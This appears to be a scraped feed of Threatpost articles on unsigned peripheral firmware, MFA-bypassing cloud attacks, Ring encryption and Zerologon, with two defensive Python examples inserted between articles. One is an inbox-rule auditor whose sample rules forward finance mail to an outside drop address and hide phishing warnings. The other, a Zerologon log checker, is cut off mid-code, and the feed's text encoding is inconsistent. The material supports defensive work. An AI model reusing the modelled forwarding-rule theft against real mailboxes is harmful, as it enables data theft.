Meanwhile, the firmware updates distributed by HP for the HP Wide Vision FHD camera found in the HP Spectre x360 Convertible 13-ap0xxx laptop are unencrypted and lack authenticity checks, Eclypsium noted. The device’s firmware updater is composed of SunplusIT’s Windows-based firmware update tool along with the firmware image, and both have issues.

“The firmware image does not include any form of cryptographic signature or other authenticity information,” according to the report. “The Windows-based firmware update tool accepts firmware files that have been modified to adjust USB descriptor contents. This ability to modify USB descriptors can be leveraged to disable the device or cause it to be identified as a different type of USB device. Once additional details of the processor architecture are discovered, the camera module behavior can be altered to be malicious.”

Also, the SunplusIT firmware updater can successfully update a device even as a normal user, rather than requiring administrator access – a violation of best practices.

Eclypsium researchers also found that the firmware of the Wi-Fi adapter on Dell XPS 15 9560 laptops running Windows 10 has a bug. While Windows 10 confirms that the driver itself is correctly signed, that’s where the security checks stop: nothing verifies the firmware image the driver then loads into the adapter. If the driver files are correctly signed, a small certificate icon is displayed next to the driver when viewed in Device Manager; if they aren’t, a user can still successfully load them – the icon merely goes away. This means that a privileged attacker could easily replace the driver files.

And finally, the researchers also took a look at the Linux Vendor Firmware Service, which is a secure portal that allows hardware vendors to upload firmware updates.
An analysis showed multiple insecure updates and drivers.

“From this resource we can focus specifically on update protocols and easily review which are signed and which are not,” the researchers wrote. “While we can see that some of the update protocols are related to transport, many others are protocols used for the actual update process. For example, VLI USB Hub firmware is unsigned.”

## Vendor Response

Eclypsium researchers notified HP of the webcam firmware vulnerability on August 4, and Lenovo of the TouchPad/TrackPoint vulnerability on June 13.

“We expect some vendors will issue CVEs, but none have as of yet,” Jesse Michael, principal researcher at Eclypsium, told Threatpost. “For these peripherals, the OEMs (HP and Lenovo) have to work with their suppliers to develop fixes. From what we’ve seen, most of these existing components were initially designed to have unsigned firmware, making them inherently vulnerable. Our interactions with these OEMs lead us to expect that future systems will have firmware update authentication requirements built in.”

Eclypsium also reported the Wi-Fi issue to both Qualcomm, which provides the chipset and driver for the wireless card, and to Microsoft, which checks that such drivers are signed.

“Qualcomm responded that their chipset is subordinate to the processor, and that the software running on the CPU is expected to take responsibility for validating firmware,” Michael said. “They stated that there was no plan to add signature verification for these chips.
However, Microsoft responded that it was up to the device vendor to verify firmware that is loaded into the device.” The result is that this will likely go unaddressed, since each party is pointing responsibility back at the other.

Bottom line: Unsigned firmware in peripheral devices remains a highly overlooked aspect of cybersecurity, and provides multiple pathways for malicious actors to compromise laptops and servers.

“Once firmware on any of these components is infected, the malware stays undetected by any software security controls,” Michael said. “Despite previous in-the-wild attacks, peripheral manufacturers have been slow to adopt the practice of signing firmware, leaving millions of Windows and Linux systems at risk of firmware attacks that can exfiltrate data, disrupt operations and deliver ransomware.”

**_Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us _**[**_Wednesday, Feb. 19 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)**_ when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts.
This webinar is for security and DevOps engineers, IoT edge developers and security executives._**

", "cvss3": {}, "published": "2020-02-18T11:00:08", "type": "threatpost", "title": "Lenovo, HP, Dell Peripherals Face Unpatched Firmware Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-18T11:00:08", "id": "THREATPOST:815A85AC4471792F2F220EAD5DD49460", "href": "https://threatpost.com/lenovo-hp-dell-peripherals-unpatched-firmware/152936/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-15T21:55:38", "description": "

The Feds are warning that cybercriminals are bypassing multi-factor authentication (MFA) and successfully attacking cloud services at various U.S. organizations.

According to an alert issued Wednesday by the Cybersecurity and Infrastructure Security Agency (CISA), there have been “several recent successful cyberattacks” focused on compromising the cloud. Most of the attacks are opportunistic, taking advantage of poor cloud cyber-hygiene and misconfigurations, according to the agency.

“These types of attacks frequently occurred when victim organizations’ employees worked remotely and used a mixture of corporate laptops and personal devices to access their respective cloud services,” the alert outlined.
“Despite the use of security tools, affected organizations typically had weak cyber-hygiene practices that allowed threat actors to conduct successful attacks.”

For instance, in one case, an organization did not require a virtual private network (VPN) for remote employees accessing the corporate network.

“Although their terminal server was located within their firewall, due to remote work posture, the terminal server was configured with port 80 open to allow remote employees to access it – leaving the organization’s network vulnerable [to brute-forcing],” CISA explained.

The agency also noted that phishing and possibly a “pass-the-cookie” attack have been the primary attack vectors for the cloud attacks.

## **Phishing and Bypassing MFA**

On the phishing front, targets are being sent emails containing malicious links, which purport to take users to a “secure message.” Other emails masquerade as alerts for legitimate file-hosting services. In both cases, the links take targets to a phishing page, where they’re asked to provide account credentials. The cybercriminals thus harvest these and use them to log into cloud services.

“CISA observed the actors’ logins originating from foreign locations (although the actors could have been using a proxy or The Onion Router (Tor) to obfuscate their location),” according to the alert. “The actors then sent emails from the user’s account to phish other accounts within the organization. In some cases, these emails included links to documents within what appeared to be the organization’s file-hosting service.”

Meanwhile, attackers have been able to bypass MFA using a [“pass-the-cookie” attack](<https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/>).
Browser cookies are used to store user authentication information so a website can keep a user signed in. The authentication information is stored in a cookie after the MFA test is satisfied, so the user isn\u2019t prompted for an MFA check again.\n\nThus, if attackers extract the right browser cookies they can authenticate as a targeted user in a separate browser session, bypassing all MFA checkpoints. As explained in a recent posting from Stealthbits, an attacker would need to convince a user to click on a phishing email or otherwise compromise a user\u2019s system, after which it\u2019s possible to execute code on the machine. A simple command would allow an attacker to extract the appropriate cookie.\n\n\u201cIt is important to note that not understanding the weaknesses and potential hacking bypasses of MFA is almost as bad as not using it,\u201d said Roger Grimes, data-driven defense evangelist at KnowBe4, via email. \u201cIf you think you\u2019re far less likely to be hacked because of MFA (and that isn\u2019t true), then you are more likely to let your defenses down. But if you understand how MFA can be attacked, and share that with the end users of the MFA and designers of the systems that it relies on, you\u2019re more likely to get a better, less risky outcome. The key is to realize that everything can be hacked. MFA doesn\u2019t impart some special, magical defense that no hacker can penetrate. 
Instead, strong security awareness training around any MFA solution is crucial, because to do otherwise is to be unprepared and more at risk.\u201d\n\n## **Exploiting Forwarding Rules**\n\nCISA said that it has also observed threat actors, post-initial compromise, collecting sensitive information by taking advantage of email forwarding rules.\n\nForwarding rules allow users to send work emails to their personal email accounts \u2013 a useful feature for remote workers.\n\nCISA said that it has observed threat actors modifying an existing email rule on a user\u2019s account to redirect the emails to attacker-controlled accounts.\n\n\u201cThreat actors also modified existing rules to search users\u2019 email messages (subject and body) for several finance-related keywords (which contained spelling mistakes) and forward the emails to the threat actors\u2019 account,\u201d according to the agency. \u201cThe threat actors [also] created new mailbox rules that forwarded certain messages received by the users (specifically, messages with certain phishing-related keywords) to the legitimate users\u2019 RSS Feeds or RSS Subscriptions folder in an effort to prevent warnings from being seen by the legitimate users.\u201d\n\n## **Cloud Security**\n\nCloud adoption, spurred by pandemic work realities, will only [accelerate in the year ahead](<https://threatpost.com/2021-cybersecurity-trends/162629/>) with software-as-a-service, cloud-hosted processes and storage driving the charge. 
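The three rule manipulations CISA describes (redirecting mail to attacker-controlled accounts, filtering on misspelled finance keywords before forwarding, and parking security warnings in the RSS folders) can all be audited from a mailbox's rule export. The following is an added example written for this page, not CISA's or Threatpost's code: it scores inbox rules represented as dictionaries carrying a subset of the property names that Exchange Online's Get-InboxRule returns. The internal domain, the keyword lists and the sample rules are constructed assumptions, and the fuzzy match exists precisely because the keywords CISA saw were misspelled.

```python
"""Audit Exchange inbox rules for the abuse patterns CISA describes.

Added example for this page, not CISA's or Threatpost's code. Each rule is a
dict carrying a subset of the properties Exchange Online's Get-InboxRule
returns (Name, ForwardTo, ForwardAsAttachmentTo, RedirectTo,
SubjectOrBodyContainsWords, MoveToFolder, DeleteMessage); the domain list,
keyword lists and sample rules below are constructed for the example.
"""
import difflib

INTERNAL_DOMAINS = {"corp.example"}          # assumption: the org's own mail domains

# Folders users rarely open; the alert saw warnings parked in RSS folders.
HIDDEN_FOLDERS = {"rss feeds", "rss subscriptions", "junk email", "deleted items"}

FINANCE_WORDS = ["invoice", "payment", "wire transfer", "remittance",
                 "purchase order", "bank account", "routing number"]
SECURITY_WORDS = ["phishing", "phish", "suspicious", "hacked", "compromised",
                  "password reset", "security alert"]


def _domain(address):
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def fuzzy_hits(keywords, vocabulary, cutoff=0.8):
    """Rule keywords that contain, or are misspellings of, a vocabulary word.

    CISA noted the finance keywords in modified rules contained spelling
    mistakes, so an exact-match list would miss them; difflib's similarity
    ratio catches forms such as 'invioce' and 'paymnet'.
    """
    hits = []
    for kw in keywords:
        k = kw.lower()
        if any(v in k for v in vocabulary) or difflib.get_close_matches(k, vocabulary, n=1, cutoff=cutoff):
            hits.append(kw)
    return hits


def audit_rule(rule):
    """Return [(finding_code, detail), ...] for one rule; empty list if clean."""
    findings = []
    targets = (rule.get("ForwardTo", []) + rule.get("ForwardAsAttachmentTo", [])
               + rule.get("RedirectTo", []))
    external = [a for a in targets if _domain(a) not in INTERNAL_DOMAINS]
    words = rule.get("SubjectOrBodyContainsWords", [])

    if external:
        findings.append(("external_forward", ", ".join(external)))
        finance = fuzzy_hits(words, FINANCE_WORDS)
        if finance:
            findings.append(("finance_keyword_exfil", ", ".join(finance)))
        if rule.get("DeleteMessage"):
            findings.append(("delete_after_forward", "original removed from inbox"))

    folder = rule.get("MoveToFolder", "")
    security = fuzzy_hits(words, SECURITY_WORDS)
    if folder.lower() in HIDDEN_FOLDERS and security:
        findings.append(("hidden_security_mail", f"{', '.join(security)} -> {folder}"))
    return findings


def audit_mailbox(rules):
    """Map rule name -> findings for every rule that triggered at least one."""
    report = {}
    for rule in rules:
        findings = audit_rule(rule)
        if findings:
            report[rule["Name"]] = findings
    return report


# Constructed sample rules for one mailbox.
SAMPLE_RULES = [
    {"Name": "Finance copies",
     "SubjectOrBodyContainsWords": ["invioce", "paymnet", "wire transfer"],
     "ForwardTo": ["collector@mailbox-drop.example"], "DeleteMessage": True},
    {"Name": "Tidy up",
     "SubjectOrBodyContainsWords": ["phishing", "suspicious login"],
     "MoveToFolder": "RSS Subscriptions"},
    {"Name": "Home copy", "ForwardTo": ["jane.home@webmail.example"]},
    {"Name": "Out of office", "RedirectTo": ["deputy@corp.example"],
     "SubjectOrBodyContainsWords": ["invoice"]},
]

if __name__ == "__main__":
    for name, findings in audit_mailbox(SAMPLE_RULES).items():
        for code, detail in findings:
            print(f"{name}: {code} ({detail})")
```

Feed it the JSON export of `Get-Mailbox | Get-InboxRule` from every mailbox rather than one; the 0.8 similarity cutoff is deliberately loose, so treat hits as review items and pair each with the mailbox audit log entry that records who created or changed the rule and from where.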
A study by Rebyc found that 35 percent of companies surveyed said they plan to accelerate workload migration to the cloud in 2021.\n\nBudget allocations to cloud security will double as companies look to protect cloud buildouts in the year ahead, according to Gartner.\n\n\u201c[Companies] by shifting the responsibility and work of running hardware and software infrastructure to cloud providers, leveraging the economics of cloud elasticity, benefiting from the pace of innovation in sync with public cloud providers, and more,\u201d said David Smith, distinguished VP Analyst at Gartner.\n\nAccordingly, cloud applications and environments are increasingly[ in the sights of attackers](<https://threatpost.com/cloud-king-software-security-trends-2021/162442/>). In December for instance, the National Security Agency issued a warning that threat actors have developed techniques to leverage vulnerabilities in on-premises network access to [compromise the cloud](<https://media.defense.gov/2020/Dec/17/2002554125/-1/-1/0/AUTHENTICATION_MECHANISMS_CSA_U_OO_198854_20.PDF>).\n\n\u201cMalicious cyber-actors are abusing trust in federated authentication environments to access protected data,\u201d the advisory read. \u201cThe exploitation occurs after the actors have gained initial access to a victim\u2019s on-premises network. The actors leverage privileged access in the on-premises environment to subvert the mechanisms that the organization uses to grant access to cloud and on-premises resources and/or to compromise administrator credentials with the ability to manage cloud resources.\u201d\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. 
ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n\n_ _\n", "cvss3": {}, "published": "2021-01-14T16:45:04", "type": "threatpost", "title": "Cloud Attacks Are Bypassing MFA, Feds Warn", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-14T16:45:04", "id": "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "href": "https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:53:15", "description": "Smart doorbell maker Ring is giving cybersecurity critics less to gripe about with the introduction of end-to-end encryption to many of its models. Ring products, which have been a juggernaut success with consumers, have faced a litany of harsh criticism from cybersecurity experts for what they say is a [lack of attention to basic digital security](<https://threatpost.com/fbi-ring-smart-doorbells-sabotage-cops/158837/>).\n\nAfter a much anticipated response to critics, Ring this week rolled out end-to-end encryption for many of its home security camera products. 
End-to-end encryption, according to Ring, can be added to less than 50 percent of its in-use products. Older model smart-doorbell products, such as its first and second-generation video doorbells, cannot be upgraded with the added protection.\n\nThe move was anticipated, but initiated later than planned. \n[](<https://threatpost.com/2020-reader-survey/161168/>)\n\nTechnical specifics by the Amazon-owned company Ring [were made available on Wednesday](<https://assets.ctfassets.net/a3peezndovsu/5jmqFoKyaCXpL2qBG46Zqn/72d138d896e7460c5bdae07992ad491e/Ring_Encryption_Whitepaper.pdf>) (PDF) as part of a technical preview of the new security measures. Ring\u2019s end-to-end encryption plans was first announced in September and originally slated to be introduced by the end of 2020.\n\nThe feature\u2014which will be optional and free for customers\u2014will allow only the device authorized and enrolled with the associated Ring account to accept and access the live Ring video stream. If third parties want to view a recording or stream on another device, they will need access to an encryption key stored on the mobile device authorized to view the stream.\n\nIt\u2019s unclear how [law enforcements\u2019 access to Ring doorbell feeds](<https://threatpost.com/rings-police-partnerships-racial-bias/157140/>) might be impacted \u2013 if at all.\n\n## **Clamoring Critics**\n\nThe company has faced years of criticism for flaws in the system that opened video and data collected by the system to be stolen by threat actors. Still other critics blasted Ring for what they said were the company\u2019s own dodgy data-collection practices.\n\nLast year, Amazon [patched a vulnerability](<https://threatpost.com/senators-amazon-ring-privacy-policies/150533/>) in the Ring smart doorbell that could have allowed attackers to access the owner\u2019s Wi-Fi network credentials and potentially reconfigure the device to launch an attack on the home network.\n\nA couple of days later, five U.S. 
Senators demanded in a letter to Amazon CEO Jeff Bezos that Amazon disclose how it\u2019s securing Ring home-security device footage\u2013and who is allowed to access that footage.\n\nLast October, Ring raised privacy hackles again when [it unveiled](<https://threatpost.com/ring-drone-privacy/159562/>) the new Always Home Cam, a smart home security camera drone that flies around homes taking security footage of people inside their own homes. Due to Amazon\u2019s already questionable data-collection practices, privacy advocates worried that the footage could fall into the wrong hands.\n\n## **Front Door Mitigations **\n\nOn Wednesday, Ring outlined how it would specifically address those concerns. It said Ring will add an extra layer of security and privacy in addition to Ring\u2019s existing encryption, which by default encrypts videos when they are uploaded to the cloud and stored on Ring\u2019s servers, the company said.\n\n\u201cWith End-to-End Encryption, customer videos are further secured with an additional lock, which can only be unlocked by a key that is stored on the customer\u2019s enrolled mobile device, designed so that only the customer can decrypt and view recordings on their enrolled device,\u201d according to a [Ring blog post](<https://blog.ring.com/2021/01/13/ring-launches-video-end-to-end-encryption/>) about the rollout.\n\nRing said the service gives users \u201ccontrol and additional choices for encrypting and decrypting their videos and is designed so that no unauthorized third party can access user video content,\u201d according to a [whitepaper](<https://threatpost.com/hacks-android-windows-zero-day/163007/>) Ring posted online about the service.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/14080350/Ring_End_to_End_Encryption.jpg>)\n\nRing Diagram of End-to-End Encryption Overview\n\nVideos encrypted when the feature is turned off will still be encrypted if the user decides to disable end-to-end encryption, 
according to the whitepaper, which also provides step-by-step instructions about how the feature works as well as specific details about what type of encryption the company is using.\n\nEnd-to-end encryption certainly adds a layer of privacy that many customers and privacy advocates have long wanted from Ring, which since its inception has constantly pushed the boundaries of how much privacy people are willing to give up for home security protection.\n\n## **Following Zoom\u2019s Lead**\n\nThe move to add end-to-end encryption to Ring is similar to one that online videoconferencing service [Zoom took last year](<https://threatpost.com/zoom-end-to-end-encryption-paying-users/156286/>) to encrypt video streams amid privacy concerns and numerous security breaches of the service, such as [Zoom bombing](<https://threatpost.com/fbi-threatens-zoom-bombing-trolls-with-jail-time/154495/>) and [zero-day vulnerabilities](<https://threatpost.com/alleged-zoom-zero-days-for-windows-macos-for-sale-report/154846/>), among others. Zoom, however, made the feature available to only paid users of the service.\n\nWhile Ring\u2019s new feature has privacy and security benefits, it also will disrupt some existing features of the service, such as accessing Ring video through Alexa, and Echo Show or Fire TV device, or sharing with other cameras.\n\nThe encryption also may throw a wrench in [controversial plans](<https://threatpost.com/fbi-ring-smart-doorbells-sabotage-cops/158837/>) to use Ring\u2019s Neighbors app to share data footage from Ring devices with law enforcement, such as what\u2019s happening in [a program being tested by police](<https://threatpost.com/police-livestream-ring-camera-mississippi/160936/>) in Mississippi in which they can livestream video from Ring cameras installed at private homes and businesses. 
When launched, the program sounded an alarm bell with privacy advocates like the Electronic Frontier Foundation, which [called the launch](<https://www.eff.org/deeplinks/2020/11/police-will-pilot-program-live-stream-amazon-ring-cameras>) of the program its \u201cworst fears\u201d being \u201cconfirmed.\u201d\n\nHowever, as the feature is optional and Ring users can choose to share encryption keys with third parties, it will still be possible to both stream video to other devices and share video streams with law enforcement if the owner of the device so chooses.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. 
ET._
", "cvss3": {}, "published": "2021-01-14T13:28:22", "type": "threatpost", "title": "Ring Adds End-to-End Encryption to Quell Security Uproar", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-14T13:28:22", "id": "THREATPOST:6B7259AD7487C6D17E0A301E14AEB7CB", "href": "https://threatpost.com/ring-adds-end-to-end-encryption-to-quell-security-uproar/163042/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:53:29", "description": "Microsoft is taking matters into its own hands when it comes to companies that haven’t yet updated their systems to address the critical Zerologon flaw. The tech giant will soon by default block vulnerable connections on devices that could be used to exploit the flaw.

Starting Feb. 9, Microsoft said it will enable domain controller “enforcement mode” by default, a measure that would help mitigate the threat.

Microsoft Active Directory domain controllers are at the heart of the Zerologon vulnerability. Domain controllers respond to authentication requests and verify users on computer networks. [A successful exploit of the flaw](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) allows unauthenticated attackers with network access to domain controllers to completely compromise all Active Directory identity services.

Domain Controller enforcement mode “will block vulnerable connections from non-compliant devices,” said Aanchal Gupta, VP of engineering with Microsoft [in a Thursday post](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>). “DC enforcement mode requires that all Windows and non-Windows devices use secure RPC with Netlogon secure channel unless customers have explicitly allowed the account to be vulnerable by adding an exception for the non-compliant device.”

Secure RPC here means Netlogon calls that are signed and sealed over the established secure channel. A client that negotiates away signing and sealing, which is what the Zerologon exploit relies on, cannot complete the session once enforcement is on.

Enforcement mode does not keep attackers off the network; it rejects the unsigned Netlogon connections that the Zerologon privilege-escalation exploit ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) depends on, so network access to a domain controller is no longer enough. The flaw, with a critical-severity CVSS score of 10 out of 10, was first addressed in [Microsoft’s August 2020 security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). But [starting in September](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), at least four public proof-of-concept (PoC) exploits for the flaw were released on [GitHub](<https://github.com/dirkjanm/CVE-2020-1472>), along with technical details of the vulnerability.

The enforcement mode “is a welcome move because it is such a potentially damaging vulnerability that could be used to hijack full Domain Admin privileges – the ‘Crown Jewels’ of any network providing an attacker with God-mode for the Windows server network,” Mark Kedgley, CTO at New Net Technologies (NNT), told Threatpost. “By defaulting this setting it is clear that it is seen as too dangerous to leave open. [The] message to everyone is to patch often and regularly and ensure your secure configuration build standard is up to date with the latest [Center for Internet Security] or [Security Technical Implementation Guide] recommendations.”

Zerologon has grown more serious over the past few months as several threat actors and advanced persistent threat (APT) groups closed in on the flaw, including the [China-backed APT Cicada](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) and [the MERCURY APT group](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>).

“Reported attacks began occurring within just two weeks of the vulnerability being disclosed,” Ivan Righi, cyber threat intelligence analyst at Digital Shadows, told Threatpost. “APT10 (aka Cicada, Stone Panda, and Cloud Hopper) was also observed leveraging Zerologon to target Japanese companies in November 2020.”

The U.S. government has also stepped in to rally organizations to update after the publication of the exploits, with the DHS issuing [a rare emergency directive](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) that ordered federal agencies to patch their Windows Servers against the flaw by Sept. 21.

Gupta for his part said that organizations can take four steps to close the flaw: update every domain controller with the Aug. 11, 2020 update or a later one; find which devices are making vulnerable connections by monitoring event logs; address those non-compliant devices; and enable domain controller enforcement mode.

“Considering the severity of the vulnerability, it is advised that all Domain Controllers be updated with the latest security patch as soon as possible,” Righi told Threatpost.
", "cvss3": {}, "published": "2021-01-15T21:47:20", "type": "threatpost", "title": "Microsoft Implements Windows Zerologon Flaw 'Enforcement Mode'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2021-01-15T21:47:20", "id": "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "href": "https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-02T21:47:09", "description": "A spike in exploitation attempts against the Microsoft vulnerability CVE-2020-1472, known as the Zerologon bug, continues to plague businesses.

That’s according to researchers from Cisco Talos, who warned that cybercriminals are redoubling their efforts to trigger the elevation-of-privilege bug in the Netlogon Remote Protocol, which was addressed in the August Microsoft Patch Tuesday release. Microsoft announced last week that it had started observing active exploitation in the wild: “We have observed attacks where public exploits have been incorporated into attacker playbooks,” the firm [tweeted on Wednesday](<https://twitter.com/MsftSecIntel/status/1308941504707063808>).

Now, the volume of those attacks is ramping up, according to Cisco Talos, and the stakes are high. Netlogon, available on Windows domain controllers, is used for various tasks related to user and machine authentication. A successful exploit allows an unauthenticated attacker with network access to a domain controller (DC) to completely compromise all Active Directory identity services, according to Microsoft.

“This flaw allows attackers to impersonate any computer, including the domain controller itself and gain access to domain admin credentials,” added Cisco Talos, [in a writeup](<https://blog.talosintelligence.com/2020/09/netlogon-rises.html#more>) on Monday. “The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol which — among other things — can be used to update computer passwords by forging an authentication token for specific Netlogon functionality.”

Four proof-of-concept (PoC) exploits [were recently released](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the issue, which is a critical flaw rating 10 out of 10 on the CVSS severity scale. That prompted the U.S. [Cybersecurity and Infrastructure Security Agency](<https://cyber.dhs.gov/assets/report/ed-20-04.pdf>) (PDF) to issue a dire warning that the “vulnerability poses an unacceptable risk to the Federal Civilian Executive Branch and requires an immediate and emergency action.” It also mandated that federal agencies patch their Windows Servers against Zerologon, in a rare emergency directive issued by the Secretary of Homeland Security.

## **Two-Phased Patching**

Microsoft’s patch process for Zerologon is a phased, two-part rollout.

The initial patch for the vulnerability was issued as part of the computing giant’s [August 11 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>), which addresses the security issue in Active Directory domains and trusts, as well as Windows devices.

However, to fully mitigate the security issue for third-party devices, users will need to not only update their domain controllers, but also enable “enforcement mode.” They should also monitor event logs to find out which devices are making vulnerable connections and address non-compliant devices, according to Microsoft.

“Starting February 2021, enforcement mode will be enabled on all Windows Domain Controllers and will block vulnerable connections from non-compliant devices,” it said. “At that time, you will not be able to disable enforcement mode.”

Last week, both Samba and 0patch [issued fixes](<https://threatpost.com/zerologon-patches-beyond-microsoft/159513/>) for CVE-2020-1472, to fill in some of the gaps that the official patch doesn’t address, such as end-of-life versions of Windows, in the case of the latter.

Samba, the open-source SMB file-server and Active Directory domain-controller implementation used to bridge Linux and Windows systems, implements the Netlogon protocol when it runs as a DC and thus suffers from the vulnerability. The bug exists when Samba is used as domain controller only (most seriously the Active Directory DC, but also the classic/NT4-style DC),
", "cvss3": {}, "published": "2020-09-29T18:13:47", "type": "threatpost", "title": "Zerologon Attacks Against Microsoft DCs Snowball in a Week", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-29T18:13:47", "id": "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "href": "https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-30T22:48:56", "description": "Threat actors continue to exploit the Microsoft Zerologon vulnerability, a situation that’s been a persistent worry to both the company and the U.S. government over the last few months. Both on Thursday renewed their pleas to businesses and end users to update Windows systems with a patch Microsoft released in August to mitigate attacks.

Despite patching awareness efforts, Microsoft said it is still receiving “a small number of reports from customers and others” about active exploits of the bug tracked as [CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>), or Zerologon, according to a [blog post](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) by Aanchal Gupta, vice president of engineering for MSRC, on Thursday.

The elevation-of-privilege vulnerability, rated critical and [patched on Aug. 11](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>), could allow an attacker to spoof a domain controller account and then use it to steal domain credentials, take over the domain and completely compromise all Active Directory identity services.

The bug sits in the Netlogon Remote Protocol (MS-NRPC), the core authentication component of Active Directory on Windows Server domain controllers, which handles user and machine authentication tasks.

Gupta urged organizations to deploy the Aug. 11 patch or a later release to every domain controller as the first in a four-step process to fix the vulnerability. Then administrators should monitor event logs to find which devices are making vulnerable connections; address identified non-compliant devices; and enable enforcement to address the bug in the overall environment, he said.

“Once fully deployed, Active Directory domain controller and trust accounts will be protected alongside Windows domain-joined machine accounts,” he said.

In addition to Microsoft’s patches, last month both Samba and 0patch also [issued fixes](<https://threatpost.com/zerologon-patches-beyond-microsoft/159513/>) for CVE-2020-1472 to fill in some of the gaps that the official patch doesn’t address, such as end-of-life versions of Windows.

Microsoft’s latest advisory was enough for the Department of Homeland Security’s (DHS’s) Cybersecurity and Infrastructure Security Agency (CISA) to step in and issue a [statement](<https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>) of its own Thursday warning organizations about continued exploitation of the bug.

Given the severity of the vulnerability, the government has been nearly as active as Microsoft in urging people to update their systems. 
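Steps two to four of that process are mechanical once the events are collected. Below is an added example written for this page (not Microsoft's or Threatpost's code): it takes Netlogon events 5827 through 5831, the IDs a patched DC writes to the System log for denied and allowed vulnerable connections under Microsoft's CVE-2020-1472 guidance, and reports which accounts still make vulnerable connections, which are covered by an explicit exception, and whether the DC is already enforcing, as signalled by the FullSecureChannelProtection registry value. The event records are simplified dictionaries and the sample data is constructed; on a real DC the events come from Get-WinEvent and the registry value from Get-ItemProperty.

```python
"""Zerologon enforcement readiness from Netlogon event data.

Added example for this page, not Microsoft's or Threatpost's code. A patched
domain controller logs the Netlogon events below to the System log (IDs and
meanings per Microsoft's CVE-2020-1472 guidance); the dictionaries here are a
simplified, constructed stand-in for those events, and the sample data is made
up. The FullSecureChannelProtection registry DWORD (1 = enforcement) lives under
HKLM\\SYSTEM\\CurrentControlSet\\Services\\Netlogon\\Parameters.
"""
from collections import defaultdict

# Denied vulnerable connections: these clients are already being refused.
DENIED = {5827: "machine account denied", 5828: "trust account denied"}
# Allowed vulnerable connections: these will be refused once enforcement is on,
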